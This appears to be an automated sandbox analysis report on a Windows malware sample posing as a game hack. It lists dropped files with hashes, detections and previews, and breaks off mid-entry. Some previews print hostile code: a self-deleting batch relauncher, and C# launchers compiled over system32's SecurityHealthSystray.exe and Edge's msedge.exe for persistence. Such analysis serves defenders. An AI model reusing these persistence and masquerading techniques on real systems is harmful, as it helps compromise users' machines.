                                    Preview:XuRbcLr6LZ1wT8XYqFzuLvrkBvk7ufhKd2zrmdfyKZ3K6ynE2SNL0KDmCraqltMp2rTaIqvMjBjw2hnNHfFbSVTTzNo5DyMbNNRPfN6MhAlykRueDNiFouXgX9k5BzJuzIipQYr4j24RtesidK20PHwdzu1fmBLr119csFOpfogv0Gx3RCc07SesVFzfhMRirMZ2ePzX5MVlkBms77OkiUtiWRHnPsHSW8Enq4YBME4u73HUcHij8r9Xc0f

                                    C:\Users\Default\Pictures\9e8d7a4ca61bd9

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):76
                                    Entropy (8bit):5.3824743883012545
                                    Encrypted:false
                                    SSDEEP:3:SPiSvTWtWfQ+X/Qzd3oRr7wCF3s92pjZ:SacTYibRr73F3j
                                    MD5:5445A8C42FDCD4F314E5874F67762282
                                    SHA1:E8F144DC2705F18ADCACFB5BF7379453D2C97EC4
                                    SHA-256:A064AB12EE30F833B770C4DA1F2BF33D74A6C6E58B4A06A92D01B12AC6B0142B
                                    SHA-512:B1FCD44F676392711F92D7DEED510FF86C4E2D2BACCE95FA2AA2E1F7D8313A057A10068743632A7060393C38174B1A52C2FFFD8E7B1F8028BA4983EE3109A0A6
                                    Malicious:false
                                    Preview:306V1l9LGwJZp4sgKzrLetzx7ifGGb2ZuIw8cEzeqmfoXDUwmQlggcjJBIXSF3Eo4tpgHtDFANe2

                                    C:\Users\Default\Pictures\RuntimeBroker.exe

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1383424
                                    Entropy (8bit):7.10154063680082
                                    Encrypted:false
                                    SSDEEP:24576:CwTyrxj57zKlIDSDZwPcd9Gm6M1e8QyDVeJl7CQC3fZeru6hSCj:DTyr7ulSPsGq3xVeJNFsZeru6hS
                                    MD5:52C95032FF8B8C3D4DFD98E51D8F6F58
                                    SHA1:E841A32CB07ADAAD4DB35B1F87B5DF6E019EB9AF
                                    SHA-256:39B35293E7EFAA4CB94028E59872013BEF4065788FEF9FE3CD3206A8AEE711E4
                                    SHA-512:A1177740FFBB476FB11F8112D98CABE3012EE3D54F2F848BB22EA99B53BD3526BF59065951FB6EF29F29408AB2FD90C942DE65FE16D66A098ABCE8BA5D7D4E00
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 78%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ... ....@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\containerRuntime.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1830
                                    Entropy (8bit):5.3661116947161815
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                    MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                    SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                    SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                    SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\runtimesvc.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1830
                                    Entropy (8bit):5.3661116947161815
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                    MD5:4E98592551BD0B069F525D5145C4AB1D
                                    SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                    SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                    SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MpDefenderCoreProtion.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1128
                                    Entropy (8bit):5.352137456245207
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qpAE4KzecKIE4oKNzKoI84j:MxHKlYHKh3oIHKx1qHmAHKzectHo6wvj
                                    MD5:EAE5EFE80D5F86B5BB8BAEF36579B0C4
                                    SHA1:EAA80274290D74F14BF65C501398863F7BCDA539
                                    SHA-256:C12CF957A87AA5C969C55DD2D808A4449722226D5DA96DD36C5086C7D5D3B29E
                                    SHA-512:6E4D2805AB7944EA371B14AB8EB2811EE3A49FC70B98E8DBF1DDA6F6B5FF327AE34B532222945366700E59A2640417B5869B9CB118270C3A0BC6F902755A60CA
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MpDefenderProtector.exe.log

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1031
                                    Entropy (8bit):5.352154694194798
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KlKDE4KhKiKhIE4Kx1qE4qpAE4KzecKIE4oKNzKoM:MxHKlYHKh3oIHKx1qHmAHKzectHo60
                                    MD5:B7B2115023E4E7524BBFAB90E6A1EEB3
                                    SHA1:6843D72FEFB2520922603012B521988EF05A7CA2
                                    SHA-256:F148B4973AEBD7535CF21F2EB0762BD825E0F3988E604ED4BE8E7C1A24F2A772
                                    SHA-512:99AEFADC22A310DE03CD93125F94116EADA1B9F001E6FBA6BBD7521D50A9F7C985A15F5A7D5F2127B100DA10B1E7EEECC1258965A99ACAFC67514961A18998C2
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\S

                                    C:\Users\user\AppData\Local\Temp\B2ESObyLKs.bat

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):203
                                    Entropy (8bit):5.206042731284723
                                    Encrypted:false
                                    SSDEEP:6:hCRLuVFOOr+DE1cNwiaZ5qWQNSKOZG1cNwi23fa:CuVEOCDEVNHelZS
                                    MD5:1B5342C9133EB989645D6702CED86B99
                                    SHA1:35DD90291AAB3A0AB143A852052B31DC1C3FCE11
                                    SHA-256:31A905447AF3B378382AEB8EADDCE71F849C79B80B666B327D814C51CBCB18C9
                                    SHA-512:C54126CC9F2B825A4EEF92B6AE2F0394D2888AEEBB894530420464B248B240CB3C481E92E650C4108B64F1470E8670C41135C07B2EA8F07DB9FB1F96FD955314
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B2ESObyLKs.bat"

                                    C:\Users\user\AppData\Local\Temp\PfW1NfxifU

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.373660689688184
                                    Encrypted:false
                                    SSDEEP:3:aoMN7j2n:azNm
                                    MD5:C31A73D77A645596C8C0C5BD25FBCE95
                                    SHA1:EA1AE4703C842EF994DDB2919A93C6C7E833BDB6
                                    SHA-256:0A3056B6FBCF1A74917016EE44D313DC972FFCECC4D74E819553D63E64E3C728
                                    SHA-512:B6104AB24853A0DF821DA634E9DBD7306D556F648A02A324A90F1751010851920F5F55DCD65853948CF30C26AF1B81F54348B7F71C939412FD8798252A34B34D
                                    Malicious:false
                                    Preview:wYYkTyYPDthxghRbLSciWjpm0

                                    C:\Users\user\AppData\Local\Temp\RES5B8E.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f4, 10 symbols, created Mon Jan 13 13:37:57 2025, 1st section name ".debug$S"
                                    Category:modified
                                    Size (bytes):1964
                                    Entropy (8bit):4.655589791378944
                                    Encrypted:false
                                    SSDEEP:24:HFO9MLzlur12ZHJwKtYN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+QEgcN:9LzK12ZSKtYilmuulB+hnqXSfbNtmhZN
                                    MD5:7E449E806888B37585DB839EE970588F
                                    SHA1:0CA333DC3448E947F7FC60DE477D8ECEBEFDD045
                                    SHA-256:E4D00D3DEAD6E72EE2B89A17CF4CAF8AB35EF7BEE9EE2C14AADE6FC93A08C486
                                    SHA-512:39903345155F436B695B728D69049E1E4F93D5F737E311A26252AF9B99C1951A0DDC34E9C4C91281A133367E2CEEC0BAC6193CBA3C143427782452C26A0F82B3
                                    Malicious:false
                                    Preview:L...5..g.............debug$S........|...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...

                                    C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.0.cs

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):386
                                    Entropy (8bit):4.941748372658632
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLRG3CaiFkD:JNVQIbSfhV7TiFkMSfhNG3C7FkD
                                    MD5:677FF7FC60E0311D7BEBBFCD555EA45B
                                    SHA1:FBF5D7395C233F6973ECA1F27E3C4B471A697884
                                    SHA-256:FE95F14C41F068E5402BBC46B16E222EBB7EC4530A8CCCAE853AB07D704A7F4F
                                    SHA-512:EFCFF575D8769F1F201D05D03E8D3A9E253D98659E9BF9761705ADE93BBC29A65DE941E937AC54DAA83949AE44A5AF34BEFE713D7658B6CEFA56FBF1450C96DE
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Cursors\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.

                                    C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.cmdline

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):5.083477818572139
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fN1:Hu7L//TRq79cQlZl1
                                    MD5:084AA95F6933D853DA06FDD9EFB16784
                                    SHA1:45BF016B972D1F7B115C1B96BB04E80810AA0588
                                    SHA-256:A6BEA0A36EF963DFF7A410C5671B3CA76B234F27BD45DC8F5F54F2FEDA0D998A
                                    SHA-512:90BE0B422B7C24FFE3EFD82A17BEA3C63F14650EEAEB43B748298D0F7410E17F53EB433BCA994304E49F9C55C33AA4E6CE1240E0DA7351DDCDC083A2CC693337
                                    Malicious:false
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.0.cs"

                                    C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.out

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (367), with CRLF, CR line terminators
                                    Category:dropped
                                    Size (bytes):788
                                    Entropy (8bit):5.2551640754922175
                                    Encrypted:false
                                    SSDEEP:24:K6MI/un/Vq79tDlQKax5DqBVKVrdFAMBJTH:GN/VqvlQK2DcVKdBJj
                                    MD5:B483897516926B5A6AD964D1F33B7975
                                    SHA1:3BFAA3F9E175E9A04C6EF7526EC9280418BE8E01
                                    SHA-256:170CAF303BC6B1CE5A49363BD0D108F66661E970FDCBDE945FC8E9A41F4CA09E
                                    SHA-512:1251BC9EC169DD5BBCA446B3D7CA300B91CB27C077FFF66C5FC38E16A93AA863C94A660161F967EC8C7857CC0759C1CD2E500308149E4C1D38198E12CE6326B3
                                    Malicious:false
                                    Preview:.C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\p3fkpuzh\p3fkpuzh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.0.cs

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                    Category:dropped
                                    Size (bytes):401
                                    Entropy (8bit):4.985747666306943
                                    Encrypted:false
                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLRG3CaiFkD:JNVQIbSfhWLzIiFkMSfhNG3C7FkD
                                    MD5:12552046D9C691F65E599B72940FF422
                                    SHA1:075333799460BCD79972E8F7F2984336AD5DC464
                                    SHA-256:BDEA88854255AAF8A2BE528CFB5B3157296E3D631D5E981F8108107FC2BFA80F
                                    SHA-512:6369B25FE8E1F19B42EDD52B2ADA2C655F65A9EA8DC86BF63E084761886FF95686BDEBC80B91B1FB9A2C1CD374208692F70B529B5DCC856E2F6F9D0823C3F566
                                    Malicious:false
                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Cursors\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.

                                    C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                    Category:dropped
                                    Size (bytes):269
                                    Entropy (8bit):5.161485678278323
                                    Encrypted:false
                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fek:Hu7L//TRRzscQlZv
                                    MD5:593290488BBC0526577C37D2D68613E4
                                    SHA1:84ABE39A0CFBC71EEB537C7B4E207E1D5535151B
                                    SHA-256:5C487C4B5E96E632F3F46048AA32331494A541CE33F9147AF4A9A0516033634B
                                    SHA-512:D560CB667CF24449B958F02C6B8580422093100D42510223744FA84DCC867B7717D1FCE99CA0C0C761B51B866A22DBCB356377AF49CED830B2037E8EB1451915
                                    Malicious:true
                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.0.cs"

                                    C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.out

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (382), with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):803
                                    Entropy (8bit):5.26321617656191
                                    Encrypted:false
                                    SSDEEP:24:K6MI/un/VRzstDWKax5DqBVKVrdFAMBJTH:GN/VRzEWK2DcVKdBJj
                                    MD5:6C62C88DCBF883B3EDB57F6FC1D821DB
                                    SHA1:116A73EDA08E4C56D9D6C9F5CED52A28062C028E
                                    SHA-256:16CB84217DBA20C9DE981A5EDB6EBF15B54CFED38E9F9BA23FF1589A039F986C
                                    SHA-512:DFF1FD1231A3F4A3ADE3C92629943384BC32A9E7738727E4AC67B76956028DCB6E95D2E78EB4F5C1989DABEFFE9D7B47233414467BCB39A07654CA605BD5FAC8
                                    Malicious:false
                                    Preview:.C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\97e9b57c6296f0

                                    Download File
                                    Process:C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
                                    File Type:ASCII text, with very long lines (458), with no line terminators
                                    Category:dropped
                                    Size (bytes):458
                                    Entropy (8bit):5.833704538744277
                                    Encrypted:false
                                    SSDEEP:12:FSeR3ioyA21Zm/nXjDjL2bnSrFPJf6Du1L/j/4Tr7bk:QeglBZm/nXjKbSBP4wL/jQTr7I
                                    MD5:7CC7B26756157C92F40257A8A733E8F4
                                    SHA1:72505C8DA0C79F0694292534E5B14820AAB9B469
                                    SHA-256:32E8F10ACD40A6FE81BE1EFD95B36BE2F508ABABAEF99BC97336671547D23082
                                    SHA-512:0978B7F90734FDDEDBD4E4918343E4A853230AB91E462BE0722BDD0A85E82AFF7269D6ED8E53E8A26A40E896AE07E0B739336FC67EE863708581982ADC5C419F
                                    Malicious:false
                                    Preview:DXev6IF8ogjZsQER8DOCauOPPsYF51TVAtLdHmevWlG3uVFd7SuFyJBSIOgNt9DxNOY9ElKVicqznUe3m5ImHNg1s3U2GRCWhTpg6GZWHYgWdMpxumly1bqAshRLQRPRaTRTp87ffvesqJYgNhIepNfGnpxZzNG0JO6K4VIvpFSF67TiJu7tJumMxKq9KhqSpojcNNl2YXzk5ZKpVPPEPWqYmuWuoJkHZAaRX1U5JFUw5BRXAAn5SlCS8Lzd10NPwrL492Re4U4JB4clc8uofozx8HTMB1ES2F9O0WYHtJA7q2QEtOA2GiuH2X61jFcCQmQ64OuFkm4Vo1HF1Pdx0LLTV2Vcaghnq7rElUJed4SdoYdBQ09UmpMEa6kC2RpDFRpqJCdhF8T62sp7YUMjgNBBvmootHmMPPYXsx1NWcOnVPLsRmniFFg1Pn4gYzx7WHqnTSPkd8

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):104
                                    Entropy (8bit):5.148764152109411
                                    Encrypted:false
                                    SSDEEP:3:qzL10zJhC/ae/zsAHhQLgW7saXj9WQN1VBUn:qP+lhCnhBQpXj9WQNxU
                                    MD5:FBEF3B76368E503DCA520965BB79565F
                                    SHA1:9A1A27526B8B9BDAAE81C5301CD23EB613EA62BA
                                    SHA-256:BCB2AF67A4EA1E6AA341CF3141941DBE7B17F1911E7F20ABA46552571F99C9F3
                                    SHA-512:2B99BC9A945B6D9A2C0D3206DCE9221EB7F4A2040C5096909D60C3278254C52B39A28DD18DD4E005EFF0EBD7E7CBA6DD3A6A94EA8A7D7598DA3001DA174DB3F5
                                    Malicious:false
                                    Preview:%jzOvzdselMnn%%jIqPQVldutsgTz%..%ZiNfvZVusnY%"%AppData%\WinRuntimePerfMonitor/runtimesvc.exe"%UYoWwdhRT%

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1700533
                                    Entropy (8bit):7.0902455625657685
                                    Encrypted:false
                                    SSDEEP:49152:ubA3j1Tyr7ulSPsGq3xVeJNFsZeru6hS3:ube2rylSPsGIuJH1thS3
                                    MD5:BC7804FCA6DD09B4F16E86D80B8D28FA
                                    SHA1:A04800B90DB1F435DD1AC723C054B14D6DD16C8A
                                    SHA-256:1628864AB0BAFE8AFEA2AD70956B653550DAB3DB7C4CDF6F405E93A6C2441DCE
                                    SHA-512:7534AC0A215F02AF85BDF2B414E23FACE0570943F8820E7BFE97EA274CCD1A01618556E93B7465C2D9FBB0BCDE5E97FAB9E9B6BDDD366554277EF308CDE3A83C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 66%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3115520
                                    Entropy (8bit):7.863824279295955
                                    Encrypted:false
                                    SSDEEP:49152:43X27p1EZKMnkmWg8LX5prviYDyKS5AypQxbRQAo9JnCmpEu/nRFfjI7L0qb:4WHTPJg8z1mKnypSbRxo9JCm
                                    MD5:10E817A4D5E216279A8DE8ED71C91044
                                    SHA1:97C6FB42791BE24D12BD74819EF67FA8F3D21724
